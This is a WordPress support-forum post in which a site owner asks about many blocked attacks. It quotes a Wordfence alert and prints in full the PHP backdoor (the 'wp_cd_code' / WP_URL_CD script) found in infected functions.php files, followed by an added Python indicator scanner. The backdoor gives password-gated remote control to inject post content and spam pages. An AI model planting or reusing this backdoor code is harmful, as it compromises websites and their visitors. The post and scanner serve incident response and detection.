Attacks Blocked
HELLO WORDFENCE
First of all, thank you so much for the service you provide. I’ve currently got about 5 websites with WORDFENCE in my portfolio and, generally speaking, I get about 1-10 attacks a week blocked.
Recently I installed WORDFENCE on a new website hsnf.co.uk and I’m amazed to be seeing around +150 attacks daily.
Should I be worried about this and are there any steps to be taken to see why this is the case?
Also, about a week ago, I received an email for my other domain, but because I’m on a shared host all my domains are in one place and actually each domain was affected with the scripts below. I managed to delete the infected files and restore them to their original condition.
I’m unaware how that script managed to creep in. I haven’t seen anything suspicious until now where one of my new domains is getting 150+ attacks daily. Is deleting the files enough? Since it’s been a week, should I safely assume that the problem won’t return?
This email was sent from your website "PIPKIN" by the Wordfence plugin.

Wordfence found the following new issues on "PIPKIN".

Alert generated at Saturday 1st of April 2017 at 01:04:25 AM

Critical Problems:

* WordPress core file modified: wp-includes/post.php
* File appears to be malicious: wp-content/themes/twentyfifteen/functions.php
* File appears to be malicious: wp-content/themes/twentyseventeen/functions.php
* File appears to be malicious: wp-content/themes/twentysixteen/functions.php
* File appears to be malicious: wp-content/themes/wr-nitro/functions.php
* File appears to be malicious: wp-content/themes/wr-nitro-child/functions.php
* File appears to be malicious: wp-includes/post.php

Warnings:

* Modified theme file: wp-content/themes/twentyfifteen/functions.php
* Modified theme file: wp-content/themes/twentysixteen/functions.php
* Unknown file in WordPress core: wp-includes/class.wp.php
* Unknown file in WordPress core: wp-includes/wp-cd.php

```php
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'fc5e5747f2235a4b772ced6265e750c5')) {
    switch ($_REQUEST['action']) {
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) {
                $data['code'] = '';
                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) {
                    $data['code'] = $_[1];
                }
                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;
        case 'set_id_links';
            if (isset($_REQUEST['data'])) {
                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) {
                    print "true";
                }
            }
            break;
        case 'create_page';
            if (isset($_REQUEST['remove_page'])) {
                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"')) {
                    print "true";
                }
            } elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content'])) {
                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url'])
                    .'", `title` = "'.mysql_escape_string($_REQUEST['title'])
                    .'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords'])
                    .'", `description` = "'.mysql_escape_string($_REQUEST['description'])
                    .'", `content` = "'.mysql_escape_string($_REQUEST['content'])
                    .'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content'])
                    .'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title'])
                    .'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords'])
                    .'", `description` = "'.mysql_escape_string($_REQUEST['description'])
                    .'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content']))
                    .'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"')) {
                    print "true";
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_URL_CD";
    }
    die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) {
    $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content) {
        print stripslashes($data -> content);
    } else {
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }
    exit;
}
?>
```
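
A file-level re-infection check built from the indicators in the alert and script quoted above, as an added example (not part of the original post and not Wordfence code). The function names and the sample tree that `demo()` builds are assumptions made for illustration.

```python
import os
import re
import tempfile

# Indicators copied from the Wordfence alert and the script quoted in the post.
UNKNOWN_CORE_FILES = {"wp-includes/class.wp.php", "wp-includes/wp-cd.php"}
CONTENT_MARKERS = {
    "wp_cd_code marker": re.compile(rb"wp_cd_code"),
    "backdoor error string": re.compile(rb"ERROR_WP_ACTION WP_URL_CD"),
    "request password compared to 32-hex constant": re.compile(
        rb"\$_REQUEST\[['\"]password['\"]\]\s*==\s*['\"][0-9a-f]{32}['\"]"),
}

def scan_site(root):
    """Return sorted (relative_path, reason) findings for one WordPress root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in UNKNOWN_CORE_FILES:
                findings.append((rel, "file is not part of WordPress core"))
            with open(full, "rb") as fh:
                data = fh.read()
            findings += [(rel, why) for why, rx in CONTENT_MARKERS.items()
                         if rx.search(data)]
    return sorted(findings)

def demo():
    """Build a constructed sample tree and scan it (sample data, not real)."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "wp-content/themes/clean/functions.php": b"<?php add_action('init', 'x');",
            "wp-content/themes/hit/functions.php":
                b"<?php if ($_REQUEST['password'] == '" + b"0" * 32 + b"') { "
                b"print 'ERROR_WP_ACTION WP_URL_CD'; }",
            "wp-includes/wp-cd.php": b"<?php // constructed placeholder file",
        }
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return scan_site(root)

if __name__ == "__main__":
    print("\n".join(f"{rel}: {why}" for rel, why in demo()))
```

On a shared host, run `scan_site()` against every domain's document root, not only the one named in the alert. The quoted script also writes to the database (a `datalist` table under the WordPress prefix and `<div id="wp_cd_code">` blocks in `post_content`), which a file scan does not cover.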
The topic ‘Attacks Blocked’ is closed to new replies.